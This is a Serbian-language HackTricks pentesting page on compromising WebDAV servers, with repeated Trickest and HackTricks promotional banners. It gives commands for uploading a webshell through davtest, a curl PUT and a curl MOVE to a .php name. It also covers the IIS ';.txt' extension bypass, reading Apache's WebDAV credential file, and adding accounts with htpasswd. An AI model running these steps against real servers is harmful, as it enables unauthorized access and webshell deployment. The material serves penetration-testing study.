7.1 KiB
WebDav
Koristite Trickest da biste lako izgradili i automatizovali radne tokove pokretane najnaprednijim alatima zajednice na svetu.
Pristupite danas:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=put-method-webdav" %}
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
Drugi načini podrške HackTricks-u:
- Ako želite da vidite svoju kompaniju reklamiranu na HackTricks-u ili da preuzmete HackTricks u PDF formatu proverite PLANOVE ZA PRIJAVU!
- Nabavite zvanični PEASS & HackTricks swag
- Otkrijte The PEASS Family, našu kolekciju ekskluzivnih NFT-ova
- Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitteru 🐦 @carlospolopm.
- Podelite svoje hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
Kada se bavite HTTP serverom sa omogućenim WebDav-om, moguće je manipulisati fajlovima ako imate odgovarajuće kredencijale, obično proverene putem HTTP Basic autentikacije. Preuzimanje kontrole nad takvim serverom često uključuje upload i izvršavanje webshell-a.
Pristup WebDav serveru obično zahteva validne kredencijale, pri čemu je WebDav brute force čest metod za njihovo dobijanje.
Da biste prevazišli ograničenja u vezi sa upload-om fajlova, posebno ona koja sprečavaju izvršavanje server-side skripti, možete:
- Upload-ovati fajlove sa izvršnim ekstenzijama direktno ako nisu ograničeni.
- Preimenovati upload-ovane neizvršne fajlove (kao .txt) u izvršnu ekstenziju.
- Kopirati upload-ovane neizvršne fajlove, menjajući njihovu ekstenziju u jednu koja je izvršna.
DavTest
Davtest pokušava da upload-uje nekoliko fajlova sa različitim ekstenzijama i proveri da li se ekstenzija izvršava:
davtest [-auth user:password] -move -sendbd auto -url http://<IP> #Uplaod .txt files and try to move it to other extensions
davtest [-auth user:password] -sendbd auto -url http://<IP> #Try to upload every extension
Cadaver
Možete koristiti ovaj alat da se povežete na WebDav server i obavljate akcije (kao što su upload, move ili delete) ručno.
cadaver <IP>
PUT zahtev
curl -T 'shell.txt' 'http://$ip'
Zahtev za POMERANJE
curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt'
Koristite Trickest da biste lako izgradili i automatizovali radne tokove pokretane najnaprednijim alatima zajednice na svetu.
Pristupite danas:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=put-method-webdav" %}
IIS5/6 WebDav Ranjivost
Ova ranjivost je veoma interesantna. WebDav ne dozvoljava upload ili preimenovanje fajlova sa ekstenzijom .asp. Međutim, možete to zaobići dodavanjem na kraj imena ";.txt" i fajl će biti izvršen kao da je .asp fajl (takođe možete koristiti ".html" umesto ".txt" ali NE zaboravite ";").
Zatim možete uploadovati svoj shell kao ".txt fajl" i kopirati/pomeriti ga u ".asp;.txt" fajl. Pristupajući tom fajlu preko web servera, on će biti izvršen (cadaver će reći da akcija pomeranja nije uspela, ali jeste).
Postavite akreditive
Ako je Webdav koristio Apache server, trebalo bi da pogledate konfigurisane sajtove u Apachu. Obično:
/etc/apache2/sites-enabled/000-default
Unutar toga možete pronaći nešto poput:
ServerAdmin webmaster@localhost
Alias /webdav /var/www/webdav
<Directory /var/www/webdav>
DAV On
AuthType Digest
AuthName "webdav"
AuthUserFile /etc/apache2/users.password
Require valid-user
Kao što možete videti, tu su fajlovi sa validnim poverljivim podacima za webdav server:
/etc/apache2/users.password
U ovom tipu datoteka pronaći ćete korisničko ime i hash lozinke. Ovo su pristupni podaci koje webdav server koristi za autentifikaciju korisnika.
Možete pokušati da ih provalite, ili da dodate više ako iz nekog razloga želite da pristupite webdav serveru:
htpasswd /etc/apache2/users.password <USERNAME> #You will be prompted for the password
Da biste proverili da li novi pristupni podaci rade, možete uraditi:
wget --user <USERNAME> --ask-password http://domain/path/to/webdav/ -O - -q
Reference
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
Drugi načini podrške HackTricks-u:
- Ako želite da vidite svoju kompaniju reklamiranu na HackTricks-u ili da preuzmete HackTricks u PDF formatu proverite PLANOVE ZA PRETPLATU!
- Nabavite zvanični PEASS & HackTricks swag
- Otkrijte The PEASS Family, našu kolekciju ekskluzivnih NFT-ova
- Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitteru 🐦 @carlospolopm.
- Podelite svoje hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
Koristite Trickest da biste lako kreirali i automatizovali radne tokove pokretane najnaprednijim alatima zajednice na svetu.
Dobijte pristup danas:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=put-method-webdav" %}